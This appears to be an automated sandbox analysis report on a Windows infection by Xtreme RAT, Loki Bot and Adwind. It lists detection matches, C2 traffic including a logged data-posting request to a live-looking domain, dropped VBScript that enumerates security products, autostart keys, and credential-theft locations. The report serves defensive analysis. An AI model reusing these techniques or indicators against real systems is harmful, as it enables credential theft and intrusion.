Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 14.1.explorer.exe.1b80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 14.1.explorer.exe.1b80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.0.svchost.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.0.svchost.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.2.iexplore.exe.c80000.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.0.svchost.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.3.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.0.Server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.1.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.290000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to register a low level keyboard hookShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C86946 SetWindowsHookExW 0000000D,Function_00006748,00000000,000000003_2_00C86946
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,3_2_00C8389C
Contains functionality to read the clipboard dataShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8389C OpenClipboard,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,3_2_00C8389C
Contains functionality to record screenshotsShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_004254C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,12_2_004254C8
Contains functionality to retrieve information about pressed keystrokesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C86748 GetKeyboardState,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,VirtualAlloc,SendMessageA,CallNextHookEx,3_2_00C86748

Software Vulnerabilities:

barindex
Exploit detected, runtime environment starts unknown processesShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\cmd.exe
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]12_2_00481C0C
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]12_2_00481FD4

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49188 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49189 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49190 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49191 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49192 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49193 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49194 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49196 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49199 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49205 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49211 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49216 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49220 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49221 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49224 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49225 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49226 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49228 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49230 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49231 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49233 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49234 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49235 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49236 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49239 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49240 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49242 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49243 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49245 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49246 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49248 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49249 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49250 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) 192.168.1.16:49253 -> 103.48.119.225:80
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49255 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49260 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49266 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49270 -> 185.208.211.131:2379
Source: TrafficSnort IDS: 2016275 ET TROJAN Win32/Xtrat.A Checkin 192.168.1.16:49275 -> 185.208.211.131:2379
Contains functionality to upload files via FTPShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,3_2_00C87918
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,3_1_00C87918
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,5_2_00C87918
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,6_2_00C87918
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,15_2_00C87918
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C87918 InternetOpenW,InternetConnectW,FtpSetCurrentDirectoryW,WaitForSingleObject,FtpPutFileW,InternetCloseHandle,InternetCloseHandle,15_1_00C87918
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C837C0 DeleteUrlCacheEntryW,DeleteFileW,URLDownloadToFileW,3_2_00C837C0
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: fashionstune.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /old/inc/img/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: fashionstune.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F85E9006Content-Length: 186Connection: close
Urls found in memory or binary dataShow sources
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exeString found in binary or memory: http://

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLMJump to behavior
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA} StubPathJump to behavior
Creates multiple autostart registry keysShow sources
Source: C:\Users\user\Desktop\sxz.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLMJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe
Creates an autostart registry keyShow sources
Source: C:\Users\user\Desktop\sxz.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exeJump to behavior
Source: C:\Users\user\Desktop\sxz.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run sxz.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLMJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLMJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run HKCUJump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 358saxio.exe

Remote Access Functionality:

barindex
ADWIND Rat detectedShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
Java source code contains strings found in CrossRATShow sources
Source: uroi.jar.2.drSuspicious string: operational.JRat (in operational/Jrat.java)
Source: _0.71076688945376033550400146700531635.class.4.drSuspicious string: operational.JRat (in operational/Jrat.java)

Stealing of Sensitive Information:

barindex
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\SimonTatham\PuTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Martin Prikryl
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: HKEY_USERS\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: HKEY_USERS\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: HKEY_USERS\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile opened: HKEY_USERS\Software\FlashPeak\BlazeFtp\Settings
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Searches for user specific document filesShow sources
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\Documents

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\InstallDir\Server.exe
